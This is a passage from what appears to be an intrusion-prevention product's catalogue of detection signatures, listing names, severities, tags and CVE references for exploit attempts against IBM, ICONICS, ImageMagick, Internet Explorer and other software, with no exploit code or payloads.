First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-658-5211
Vulnerability: IBM-SPSS-Vsview6.ocx-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-BOF

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Provisioning Manager Express for Software Distribution, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-756-5211
Vulnerability: IBM-Tivoli-Provisioning-Manager-Express-Isig.isigctl.1-ActiveX-Buffer-Overflow
Description:
Back to top

File-Text_ICONICS-Dialog-Wrapper-Module-ActiveX-Control--Overflow

About this situation: An attempt to exploit a vulnerability in ICONICS Dialog Wrapper detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ICONICS Dialog Wrapper, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: ICONICS-Dialog-Wrapper-Module-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in ICONICS WebHMI detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ICONICS WebHMI, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability
Description:
Back to top

File-Text_ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability-2

About this situation: An attempt to exploit a vulnerability in ICONICS WebHMI detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ICONICS WebHMI, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: ICONICS-WebHMI-ActiveX-Control-Stack-Buffer-Overflow-Vulnerability
Description:
Back to top

File-Text_IDAutomation-Barcode-ActiveX-Components-File-Write

About this situation: Detected an attempt to exploit a vulnerability in IDAutomation ActiveX components
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, IDAutomation Barcode ActiveX, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: IDAutomation-Barcode-ActiveX-Components-File-Write
Description:
Back to top

File-Text_Ie-Anchorclick-Style-File-Import

About this situation: IE file import to Windows startup folder via user drag and drop
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2004-12, CVE2004, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Ie-Anchorclick-Style-File-Import
Description:
Back to top

File-Text_Iframe-Src-From-IP-Address

About this situation: An Iframe with content download from IP-address detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-960-5242
Last changed: sgpkg-ips-1621-5242
Description:
Back to top

File-Text_Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in ImageMagick Studio ImageMagick detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1732-5242
Vulnerability: Imagemagick-File-Deletion-Vulnerability
Imagemagick-Ephemeral-Protocol-Arbitrary-File-Deletion
Description:
Back to top

File-Text_Imagemagick-File-Moving-Vulnerability

About this situation: Detected attempt to exploit a vulnerability in ImageMagick
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-763-5211
Vulnerability: Imagemagick-File-Moving-Vulnerability
Description:
Back to top

File-Text_Imagemagick-HTTP-Request-Vulnerability

About this situation: Detected attempt to exploit a vulnerability in ImageMagick
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-763-5211
Vulnerability: Imagemagick-HTTP_Request_Vulnerability
Description:
Back to top

File-Text_Imagemagick-Local-File-Read-Vulnerability

About this situation: Detected attempt to exploit a vulnerability in ImageMagick
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-763-5211
Vulnerability: Imagemagick-Local-File-Read-Vulnerability
Description:
Back to top

File-Text_Imagemagick-Shell-Character-Filtering-Code-Execution

About this situation: Detected attempt to exploit a vulnerability in ImageMagick
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1347-5242
Vulnerability: Imagemagick-Shell-Character-Filtering-Code-Execution
Imagemagick-Popen-Shell-Character-Filtering-Code-Execution
Description:
Back to top

File-Text_Indexing-Service-Memory-Corruption-CVE-2009-2507

About this situation: An attempt to exploit a remote code execution vulnerability in the Indexing Service on Windows systems detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-10, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Indexing-Service-Memory-Corruption-CVE-2009-2507
Description:
Back to top

File-Text_Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in InduSoft Thin Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, InduSoft Thin Client, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF

About this situation: An attempt to exploit a vulnerability in InduSoft Thin Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, InduSoft Thin Client, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-552-5211
Vulnerability: Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF
Description:
Back to top

File-Text_Information-Stealer-Using-Fake-Browser-Dialogs

About this situation: An attempt to install malware via fake browser dialogs detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Any Software, Windows not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Information-Stealer-Using-Fake-Captcha
Malicious-Site-Using-ClickFix-Technique
Description:
Back to top

File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection

About this situation: An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ingress-nginx, CVE2025, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1856-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1097
Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-24514
Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1098
Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1974
Description:
Back to top

File-Text_Injected-Wordpress-JavaScript

About this situation: Traffic that resembles a known injected JavaScript pattern detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-1146-5242
Description:
Back to top

File-Text_Intellian-Aptus-Web-OS-Command-Injection

About this situation: An attempt to exploit a vulnerability in Intellian Aptus Web OS
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Intellian Aptus Web OS, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Intellian-Aptus-Web-OS-Command-Injection
Description:
Back to top

File-Text_Internet Explorer-BGSOUND-Denial-Of-Service-CVE-2006-0544

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-721-5211
Description:
Back to top

File-Text_Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676

About this situation: An attempt to exploit a vulnerability in Internet Explorer 11.0 detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2019-02, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676
Description:
Back to top

File-Text_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting

About this situation: Attempt to exploit cross-site scripting vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer, MS2007-06, CVE2007, Windows not specific, Internet Explorer not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
Description:
Back to top

File-Text_Internet-Explorer-ADODB-Recordset-Filter-ActiveX-Vulnerability-CVE-2006-3354

About this situation: An attempt exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-721-5211
Description:
Back to top

File-Text_Internet-Explorer-Applet-File-Path-Denial-Of-Service

About this situation: An attempt exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-721-5211
Description:
Back to top

File-Text_Internet-Explorer-ASLR-Bypass-CVE-2015-0069

About this situation: An attempt to exploit a vulnerability in Internet Explorer was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-02, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Internet-Explorer-ASLR-Bypass-CVE-2015-0069
Description:
Back to top

File-Text_Internet-Explorer-AxDebugger-Document-ActiveX-Vulnerability

About this situation: An attempt exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Description:
Back to top

File-Text_Internet-Explorer-Cached-Objects-Zone-Bypass

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, Internet Explorer 5.5, MS2002, CVE2002, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-791-5211
Vulnerability: Internet-Explorer-Cached-Objects-Zone-Bypass
Description:
Back to top

File-Text_Internet-Explorer-CDocument-Object-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-06, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1202-5242
Vulnerability: Internet-Explorer-CDocument-Object-Use-After-Free
Description:
Back to top

File-Text_Internet-Explorer-Com-Object-Instantiation-Memory-Corruption

About this situation: Detects memory corruption exploits against Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2006-06, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Internet-Explorer-Com-Object-Instantiation-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-Com-Object-System-Compromise

About this situation: CLSID of an illegal COM object detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2005-07, CVE2005, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Internet-Explorer-Com-Object-System-Compromise
Description:
Back to top

File-Text_Internet-Explorer-CreateTextRange-Vulnerability

About this situation: Detects Microsoft Internet Explorer createTextRange exploits
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-04, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Internet-Explorer-CreateTextRange-Vulnerability
Description:
Back to top

File-Text_Internet-Explorer-CreateTextRange-Vulnerability-2

About this situation: Detected attempt to exploit Microsoft Internet Explorer createTextRange vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-04, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Internet-Explorer-CreateTextRange-Vulnerability
Description:
Back to top

File-Text_Internet-Explorer-CreateTextRange-Vulnerability-3

About this situation: Detected attempt to exploit Microsoft Internet Explorer createTextRange vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2006-04, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Internet-Explorer-CreateTextRange-Vulnerability
Description:
Back to top

File-Text_Internet-Explorer-CVE-2014-2795

About this situation: Detected attempt to exploit Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2014-07, CVE2014, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-596-5211
Vulnerability: Internet-Explorer-CVE-2014-2795
Description:
Back to top

File-Text_Internet-Explorer-CVE-2014-2801

About this situation: Detected attempt to exploit Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2014-07, CVE2014, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-596-5211
Vulnerability: Internet-Explorer-CVE-2014-2801
Description:
Back to top

File-Text_Internet-Explorer-CVE-2015-6065

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2015-11, CVE2015, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6065
Description:
Back to top

File-Text_Internet-Explorer-CVE-2015-6066

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2015-11, CVE2015, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1276-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6066
Description:
Back to top

File-Text_Internet-Explorer-CVE-2015-6068

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2015-11, CVE2015, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1286-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6068
Description:
Back to top

File-Text_Internet-Explorer-CVE-2015-6070

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2015-11, CVE2015, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6070
Description:
Back to top

File-Text_Internet-Explorer-CVE-2015-6076

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2015-11, CVE2015, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-6076
Description:
Back to top

File-Text_Internet-Explorer-CVE-2017-0018

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2017-03, CVE2017, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2017-0018
Description:
Back to top

File-Text_Internet-Explorer-CVE-2017-0037

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2017-03, CVE2017, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2017-0037
Description:
Back to top

File-Text_Internet-Explorer-CVE-2017-0154

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2017-03, CVE2017, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Microsoft-Internet-Explorer-CVE-2017-0154
Description:
Back to top

File-Text_Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption

About this situation: Detects memory corruption exploits against Internet Explorer
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Internet Explorer, MS2006-11, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-02, CVE2011, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-Deleted-Data-Source-Object-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption

About this situation: Detects memory corruption exploits against Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2006-08, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Internet-Explorer-DirectAnimation.DATuple-Com-Object-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-DirectAnimation.DAUserData.Data-DoS

About this situation: An attempt to exploit an Internet Explorer DirectAnimation.DAUserData.Data DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, CVE2006, Any Operating System not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Internet-Explorer-DirectAnimation.DAUserData.Data-DoS
Description:
Back to top

File-Text_Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS

About this situation: An attempt to exploit an Internet Explorer DirectAnimation.StructuredGraphicsControl.SourceURL DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, CVE2006, Any Operating System not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS
Description:
Back to top

File-Text_Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016

About this situation: A vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2015-01, CVE2015, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-624-5211
Last changed: sgpkg-ips-624-5211
Vulnerability: Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016
Description:
Back to top

File-Text_Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, MS2007-12, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, Internet Explorer 9.0, Internet Explorer 10.0, MS2013-08, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-539-5211
Vulnerability: Microsoft-Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS
Description:
Back to top

File-Text_Internet-Explorer-getElementById-JavaScript-For-Loop-DoS

About this situation: An attempt to exploit an Internet Explorer getElementById JavaScript For Loop DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, CVE2007, Any Operating System not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Internet-Explorer-getElementById-JavaScript-For-Loop-DoS
Description:
Back to top

File-Text_Internet-Explorer-HTML-Elements-Buffer-Overflow

About this situation: Attempt to exploit HTML Elements Buffer Overflow in Internet Explorerer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 6.0, MS2004-12, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-525-5211
Vulnerability: MS-Ie-Frame-Iframe-Embed-Tag-Attribute-BOF-MS04-040
Description:
Back to top

File-Text_Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS

About this situation: An attempt to exploit an Internet Explorer HtmlDlgSafeHelper Fonts DoS vulnerability.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Internet Explorer, CVE2006, Any Operating System not specific, Internet Explorer not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS
Description:
Back to top

File-Text_Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption

About this situation: An attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-02, CVE2008, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2007-02, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
Description:
Back to top

File-Text_Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2016-07, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261
Description:
Back to top

File-Text_Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow

About this situation: An attempt to exploit an Internet Explorer Long Hostname Memory Corruption Buffer Overflow vulnerability.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2005-04, CVE2005, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-671-5211
Vulnerability: Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3115

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3115
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3143

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3143
Description:
Back to top

File-Text_Internet-Explorer-Memory-Corruption-CVE-2013-3144

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-07, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
